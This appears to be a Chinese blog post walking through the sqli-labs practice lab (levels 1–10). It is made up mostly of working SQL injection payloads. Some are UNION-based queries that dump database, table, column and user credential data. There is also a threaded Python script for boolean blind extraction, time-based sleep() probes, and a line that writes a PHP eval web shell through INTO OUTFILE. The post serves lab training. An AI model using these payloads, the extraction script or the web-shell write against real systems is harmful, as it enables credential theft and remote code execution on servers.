版权声明:转载 请说明 https://blog.csdn.net/qq_38063791/article/details/83824991
1-5
'''
进数据库之前还会解码,SQL 语法中的语句 不会, str需要hex。
python的hex:先ascii 转换 再 hex
第一关
CONCAT_WS(sep,s1,s2...,sn)将s1,s2...,sn连接成字符串,并用sep字符间隔
concat_ws(@@version,database(),user())
获取所有数据库名
select 1,2,(select group_concat(schema_name) from information_schema.schemata)#
得到 基本信息
union select 1,concat_ws(0x7C,@@version,database(),0x757365722829),3 #
数据库 hex
0x736563757269747927.
得表名
%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23
得字段名
id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23
得数据:
’ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23
第三关
id=-1')order by 3 %23
爆字段
id=-1%27)union%20select%201,2,3%20%23
基本信息:
id=-1%27)union%20select%201,(select%20concat_ws(database(),@@version,user())),3%20%23
得表名
-1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23
得字段名:
id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3
第四关:
爆出字段
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 #
然后
(select group_concat(table_name) from information_schema.tables where table_schema=(select database()))
最后 得数据
select group_concat() from
6-9
import requests
'''
第6关
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 0 or (length(database())=8) #
'''
'''
第7关
http://127.0.0.1/sqli-labs-master/Less-7/?id=2%27))%20and%200%20or%20(length(database())=8)%23
'''
'''
第8关 完整
'''
import requests
from multiprocessing.dummy import Pool
messagr=[]
#数据库
#poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select database()),%d,1))=%d)'
#表名 29
# 29 个http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)'
#列名 20
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)'
#得数据218个字段
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or"+' (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)'
def expoit(start,num,poc):
poc=poc.replace('%20',' ')
poc=poc%(start,num)+'%20%23'
# print(poc)
response=requests.get(poc)
if 'You are in' in response.text:
messagr.append(chr(num))
print('数据库:',''.join(messagr))
def main(starts):
pool=Pool()
for start in range(1,starts+1):
for num in range(31,128):
pool.apply_async(expoit,args=(start,num,poc))
pool.close()
pool.join()
if __name__ == '__main__':
main(218)
'''
select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php"
'''
'''
9 10
无回显,只能sleep()来测试
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
'''